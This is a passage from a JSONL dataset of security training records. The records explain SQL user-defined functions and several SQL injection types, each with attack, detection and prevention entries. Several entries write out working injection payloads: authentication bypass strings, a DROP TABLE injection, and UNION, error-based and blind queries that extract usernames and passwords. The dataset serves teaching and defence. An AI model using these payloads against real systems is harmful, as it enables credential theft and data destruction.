Function libraries can hide malicious functionality.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086870Z", "updated_at": "2025-12-17T19:35:42.086870Z"} +{"id": "trtp-2ebd67eff7a1", "instruction": "Describe the technical aspects of SQL User-Defined Functions.", "output": "SQL User-Defined Functions consists of the following key components:\n\n- Scalar functions (return single value)\n- Table-valued functions\n- Aggregate functions\n- Language options (SQL, PL/pgSQL, C, CLR)\n- Function volatility\n- Security definer vs invoker", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086890Z", "updated_at": "2025-12-17T19:35:42.086890Z"} +{"id": "trtp-3e40a7c1cd22", "instruction": "Why is SQL User-Defined Functions important for database security?", "output": "UDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. 
Function libraries can hide malicious functionality.\n\nCommon attack vectors include:\n- Malicious UDF for code execution\n- Privilege escalation through security-definer functions\n- Backdoor functions for persistence\n- Data exfiltration via function side effects", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086905Z", "updated_at": "2025-12-17T19:35:42.086905Z"} +{"id": "trtp-5bb17eebfd3b", "instruction": "What are common attack techniques involving SQL User-Defined Functions?", "output": "Attack techniques involving SQL User-Defined Functions:\n\n- Malicious UDF for code execution\n- Privilege escalation through security-definer functions\n- Backdoor functions for persistence\n- Data exfiltration via function side effects\n\nDefenders can detect these attacks by:\n- Function inventory monitoring\n- External language function auditing\n- Function creation/modification alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086919Z", "updated_at": "2025-12-17T19:35:42.086919Z"} +{"id": "trtp-524d285907f7", "instruction": "How can security teams detect attacks related to SQL User-Defined Functions?", "output": "Methods for detecting SQL 
User-Defined Functions attacks or anomalies:\n\n- Function inventory monitoring\n- External language function auditing\n- Function creation/modification alerts\n- Function execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086930Z", "updated_at": "2025-12-17T19:35:42.086930Z"} +{"id": "trtp-2e4e88d7a271", "instruction": "What are best practices for preventing SQL User-Defined Functions?", "output": "Security controls and preventive measures for SQL User-Defined Functions:\n\n- Restrict function creation to trusted users\n- Disable external language functions when not needed\n- Use security-invoker mode by default\n- Regular function code review\n\nUDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. 
Function libraries can hide malicious functionality.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086942Z", "updated_at": "2025-12-17T19:35:42.086942Z"} +{"id": "trtp-36ebf2f2ddba", "instruction": "Show an example of SQL User-Defined Functions.", "output": "Example of SQL User-Defined Functions:\n\n```sql\nCREATE FUNCTION calculate_tax(amount DECIMAL) RETURNS DECIMAL AS $$ SELECT amount * 0.08 $$ LANGUAGE SQL;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086952Z", "updated_at": "2025-12-17T19:35:42.086952Z"} +{"id": "trtp-9ae7b44b8632", "instruction": "How does Classic SQL Injection work and what are its security implications?", "output": "Classic SQL injection occurs when user input is concatenated directly into SQL queries. Attackers inject SQL syntax to modify query logic, bypass authentication, or extract data. It remains one of the most common and dangerous web vulnerabilities.\n\nSecurity Relevance: Classic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. 
Despite being well-known for decades, it persists due to developer oversight and legacy code.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089108Z", "updated_at": "2025-12-17T19:35:42.089108Z"} +{"id": "trtp-444de4afad76", "instruction": "What are the key components of Classic SQL Injection?", "output": "Classic SQL Injection consists of the following key components:\n\n- String concatenation in query building\n- Unescaped user input\n- Quote character handling\n- Comment sequences (--)\n- Statement termination (;)", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089128Z", "updated_at": "2025-12-17T19:35:42.089128Z"} +{"id": "trtp-d2189d10e903", "instruction": "Why is Classic SQL Injection important for database security?", "output": "Classic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. 
Despite being well-known for decades, it persists due to developer oversight and legacy code.\n\nCommon attack vectors include:\n- Authentication bypass: ' OR '1'='1'--\n- Query termination: '; DROP TABLE users;--\n- Comment injection: admin'--\n- String termination: ' OR 1=1--", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089161Z", "updated_at": "2025-12-17T19:35:42.089161Z"} +{"id": "trtp-dceef4552c7d", "instruction": "What threats are associated with Classic SQL Injection?", "output": "Attack techniques involving Classic SQL Injection:\n\n- Authentication bypass: ' OR '1'='1'--\n- Query termination: '; DROP TABLE users;--\n- Comment injection: admin'--\n- String termination: ' OR 1=1--\n\nDefenders can detect these attacks by:\n- SQL keywords in user input (SELECT, UNION, OR)\n- Quote characters in parameters\n- Comment sequences in input", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089193Z", "updated_at": "2025-12-17T19:35:42.089193Z"} +{"id": "trtp-5e18419da66d", "instruction": "How do you detect exploitation of Classic SQL Injection?", "output": "Methods for detecting Classic SQL Injection attacks or anomalies:\n\n- SQL keywords in user input 
(SELECT, UNION, OR)\n- Quote characters in parameters\n- Comment sequences in input\n- Database error messages in responses", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089231Z", "updated_at": "2025-12-17T19:35:42.089231Z"} +{"id": "trtp-2c4e61d54b45", "instruction": "What security controls mitigate Classic SQL Injection risks?", "output": "Security controls and preventive measures for Classic SQL Injection:\n\n- Parameterized queries/prepared statements\n- Input validation with allowlists\n- Stored procedures with parameters\n- Least privilege database accounts\n\nClassic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. 
Despite being well-known for decades, it persists due to developer oversight and legacy code.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089248Z", "updated_at": "2025-12-17T19:35:42.089248Z"} +{"id": "trtp-63f6fa067699", "instruction": "Provide a code example for Classic SQL Injection.", "output": "Example of Classic SQL Injection:\n\n```sql\n-- Vulnerable code: \"SELECT * FROM users WHERE username='\" + input + \"'\";\n-- Attack: admin'--\n-- Result: SELECT * FROM users WHERE username='admin'--'\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089259Z", "updated_at": "2025-12-17T19:35:42.089259Z"} +{"id": "trtp-82453f8031f1", "instruction": "Describe UNION-Based SQL Injection and its role in database security.", "output": "UNION-based injection appends additional SELECT statements to extract data from other tables. The attacker must match the column count and data types of the original query. It's highly effective for data exfiltration.\n\nSecurity Relevance: UNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. 
A single successful injection can dump entire database contents.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091423Z", "updated_at": "2025-12-17T19:35:42.091423Z"} +{"id": "trtp-87817f97f5a3", "instruction": "What elements make up UNION-Based SQL Injection?", "output": "UNION-Based SQL Injection consists of the following key components:\n\n- UNION SELECT operator\n- Column count enumeration\n- Data type matching\n- NULL-based discovery\n- ORDER BY enumeration", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091443Z", "updated_at": "2025-12-17T19:35:42.091443Z"} +{"id": "trtp-485f077c8398", "instruction": "How can UNION-Based SQL Injection lead to database security incidents?", "output": "UNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. 
A single successful injection can dump entire database contents.\n\nCommon attack vectors include:\n- Column count: ORDER BY 1-- (increment until error)\n- NULL injection: UNION SELECT NULL,NULL,NULL--\n- Schema enumeration: UNION SELECT table_name,column_name FROM information_schema.columns--\n- Credential theft: UNION SELECT username,password FROM users--", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091458Z", "updated_at": "2025-12-17T19:35:42.091458Z"} +{"id": "trtp-c86ba03ac075", "instruction": "What are common attack techniques involving UNION-Based SQL Injection?", "output": "Attack techniques involving UNION-Based SQL Injection:\n\n- Column count: ORDER BY 1-- (increment until error)\n- NULL injection: UNION SELECT NULL,NULL,NULL--\n- Schema enumeration: UNION SELECT table_name,column_name FROM information_schema.columns--\n- Credential theft: UNION SELECT username,password FROM users--\n\nDefenders can detect these attacks by:\n- UNION keyword in parameters\n- ORDER BY with numeric increments\n- information_schema queries", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091482Z", "updated_at": "2025-12-17T19:35:42.091482Z"} +{"id": 
"trtp-4f8dfad8c1a1", "instruction": "What should analysts look for when monitoring for UNION-Based SQL Injection?", "output": "Methods for detecting UNION-Based SQL Injection attacks or anomalies:\n\n- UNION keyword in parameters\n- ORDER BY with numeric increments\n- information_schema queries\n- Response size anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091495Z", "updated_at": "2025-12-17T19:35:42.091495Z"} +{"id": "trtp-6fb42ecb7ad8", "instruction": "What security controls mitigate UNION-Based SQL Injection risks?", "output": "Security controls and preventive measures for UNION-Based SQL Injection:\n\n- Parameterized queries eliminate UNION injection\n- Restrict information_schema access\n- Column-level permissions\n- Response size limits\n\nUNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. 
A single successful injection can dump entire database contents.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091507Z", "updated_at": "2025-12-17T19:35:42.091507Z"} +{"id": "trtp-c9147e01b651", "instruction": "Show an example of UNION-Based SQL Injection.", "output": "Example of UNION-Based SQL Injection:\n\n```sql\n-- Column enumeration: ' ORDER BY 1,2,3,4--\n-- NULL test: ' UNION SELECT NULL,NULL,NULL--\n-- Data extraction: ' UNION SELECT username,password,NULL FROM users--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091518Z", "updated_at": "2025-12-17T19:35:42.091518Z"} +{"id": "trtp-66dde63462dc", "instruction": "Describe Error-Based SQL Injection and its role in database security.", "output": "Error-based injection extracts data through database error messages. By crafting queries that cause specific errors, attackers force the database to reveal information in error output. Works when verbose errors are displayed.\n\nSecurity Relevance: Error-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. 
It requires verbose error display but is highly reliable.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093866Z", "updated_at": "2025-12-17T19:35:42.093866Z"} +{"id": "trtp-e3e2b38cfb6e", "instruction": "What elements make up Error-Based SQL Injection?", "output": "Error-Based SQL Injection consists of the following key components:\n\n- Database error message exposure\n- Type conversion errors\n- XML functions (EXTRACTVALUE, UPDATEXML)\n- Mathematical overflow errors\n- Subquery errors", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093886Z", "updated_at": "2025-12-17T19:35:42.093886Z"} +{"id": "trtp-f585c9f8909e", "instruction": "What security risks are associated with Error-Based SQL Injection?", "output": "Error-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. 
It requires verbose error display but is highly reliable.\n\nCommon attack vectors include:\n- EXTRACTVALUE: AND EXTRACTVALUE(1,CONCAT(0x7e,version()))\n- UPDATEXML: AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)\n- Type conversion: AND 1=CONVERT(int,(SELECT password FROM users))\n- Double query: AND 1=1 UNION SELECT 1,exp(~(SELECT * FROM (SELECT password)x))", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093901Z", "updated_at": "2025-12-17T19:35:42.093901Z"} +{"id": "trtp-12ddc5fd775e", "instruction": "What attacks exploit Error-Based SQL Injection?", "output": "Attack techniques involving Error-Based SQL Injection:\n\n- EXTRACTVALUE: AND EXTRACTVALUE(1,CONCAT(0x7e,version()))\n- UPDATEXML: AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)\n- Type conversion: AND 1=CONVERT(int,(SELECT password FROM users))\n- Double query: AND 1=1 UNION SELECT 1,exp(~(SELECT * FROM (SELECT password)x))\n\nDefenders can detect these attacks by:\n- XML functions in parameters\n- CONVERT/CAST with subqueries\n- Database errors in response bodies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093916Z", "updated_at": "2025-12-17T19:35:42.093916Z"} +{"id": 
"trtp-e635d2c7a164", "instruction": "How can security teams detect attacks related to Error-Based SQL Injection?", "output": "Methods for detecting Error-Based SQL Injection attacks or anomalies:\n\n- XML functions in parameters\n- CONVERT/CAST with subqueries\n- Database errors in response bodies\n- exp() or mathematical functions with subqueries", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093929Z", "updated_at": "2025-12-17T19:35:42.093929Z"} +{"id": "trtp-c9fdcb27c8cd", "instruction": "What security controls mitigate Error-Based SQL Injection risks?", "output": "Security controls and preventive measures for Error-Based SQL Injection:\n\n- Disable verbose error messages\n- Custom error pages without technical details\n- Parameterized queries\n- Log errors server-side only\n\nError-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. 
It requires verbose error display but is highly reliable.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093942Z", "updated_at": "2025-12-17T19:35:42.093942Z"} +{"id": "trtp-ed6c64fbb669", "instruction": "Provide a code example for Error-Based SQL Injection.", "output": "Example of Error-Based SQL Injection:\n\n```sql\n-- MySQL: ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1)))--\n-- MSSQL: ' AND 1=CONVERT(int,(SELECT TOP 1 password FROM users))--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093952Z", "updated_at": "2025-12-17T19:35:42.093952Z"} +{"id": "trtp-0054dffd8873", "instruction": "Explain Boolean-Based Blind SQL Injection from a security perspective.", "output": "Boolean-based blind injection infers data through application behavior differences when injecting true vs false conditions. Attackers extract data bit-by-bit by observing response variations without direct data output.\n\nSecurity Relevance: Boolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. 
It defeats applications that suppress errors but show behavioral differences.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096115Z", "updated_at": "2025-12-17T19:35:42.096115Z"} +{"id": "trtp-ab981ef6f42c", "instruction": "What are the key components of Boolean-Based Blind SQL Injection?", "output": "Boolean-Based Blind SQL Injection consists of the following key components:\n\n- True/false condition testing\n- SUBSTRING/SUBSTR functions\n- ASCII/ORD character conversion\n- Binary search algorithm\n- Response differential analysis", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096136Z", "updated_at": "2025-12-17T19:35:42.096136Z"} +{"id": "trtp-b70f1c0b3e41", "instruction": "What security risks are associated with Boolean-Based Blind SQL Injection?", "output": "Boolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. 
It defeats applications that suppress errors but show behavioral differences.\n\nCommon attack vectors include:\n- Condition testing: AND 1=1 (true) vs AND 1=2 (false)\n- Character guessing: AND SUBSTRING(username,1,1)='a'\n- Binary search: AND ASCII(SUBSTRING(password,1,1))>64\n- Length discovery: AND LENGTH(password)>10", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096151Z", "updated_at": "2025-12-17T19:35:42.096151Z"} +{"id": "trtp-04cc12860f5b", "instruction": "What attacks exploit Boolean-Based Blind SQL Injection?", "output": "Attack techniques involving Boolean-Based Blind SQL Injection:\n\n- Condition testing: AND 1=1 (true) vs AND 1=2 (false)\n- Character guessing: AND SUBSTRING(username,1,1)='a'\n- Binary search: AND ASCII(SUBSTRING(password,1,1))>64\n- Length discovery: AND LENGTH(password)>10\n\nDefenders can detect these attacks by:\n- SUBSTRING/ASCII functions in parameters\n- Systematic true/false pattern probing\n- High request volume with similar patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096164Z", "updated_at": "2025-12-17T19:35:42.096164Z"} +{"id": "trtp-b27ceac4b142", "instruction": "How do you detect 
exploitation of Boolean-Based Blind SQL Injection?", "output": "Methods for detecting Boolean-Based Blind SQL Injection attacks or anomalies:\n\n- SUBSTRING/ASCII functions in parameters\n- Systematic true/false pattern probing\n- High request volume with similar patterns\n- Sequential character position testing", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096175Z", "updated_at": "2025-12-17T19:35:42.096175Z"} +{"id": "trtp-d4d8f8bad943", "instruction": "How can organizations protect against Boolean-Based Blind SQL Injection?", "output": "Security controls and preventive measures for Boolean-Based Blind SQL Injection:\n\n- Parameterized queries\n- Consistent responses regardless of query results\n- Rate limiting\n- Input validation\n\nBoolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. 
It defeats applications that suppress errors but show behavioral differences.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096188Z", "updated_at": "2025-12-17T19:35:42.096188Z"} +{"id": "trtp-9361b22e8752", "instruction": "What is the syntax for Boolean-Based Blind SQL Injection?", "output": "Example of Boolean-Based Blind SQL Injection:\n\n```sql\n-- True test: ' AND 1=1--\n-- False test: ' AND 1=2--\n-- Character extraction: ' AND SUBSTRING(password,1,1)='a'--\n-- ASCII extraction: ' AND ASCII(SUBSTRING(password,1,1))>97--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096198Z", "updated_at": "2025-12-17T19:35:42.096198Z"} +{"id": "trtp-def5e2cf8833", "instruction": "Explain Time-Based Blind SQL Injection from a security perspective.", "output": "Time-based blind injection extracts data by measuring response delays from conditional SLEEP or WAITFOR statements. When a condition is true, the query delays; when false, it returns immediately. Works even with completely static responses.\n\nSecurity Relevance: Time-based injection is the most reliable blind technique, working even when response content is identical. 
Network latency affects accuracy, but it defeats all response-based defenses.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098286Z", "updated_at": "2025-12-17T19:35:42.098286Z"} +{"id": "trtp-808139a7bf12", "instruction": "What are the key components of Time-Based Blind SQL Injection?", "output": "Time-Based Blind SQL Injection consists of the following key components:\n\n- SLEEP() function (MySQL)\n- WAITFOR DELAY (SQL Server)\n- pg_sleep() (PostgreSQL)\n- BENCHMARK() for CPU delays\n- Conditional delay execution", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098307Z", "updated_at": "2025-12-17T19:35:42.098307Z"} +{"id": "trtp-7e2d8e0a6ac8", "instruction": "Why is Time-Based Blind SQL Injection important for database security?", "output": "Time-based injection is the most reliable blind technique, working even when response content is identical. 
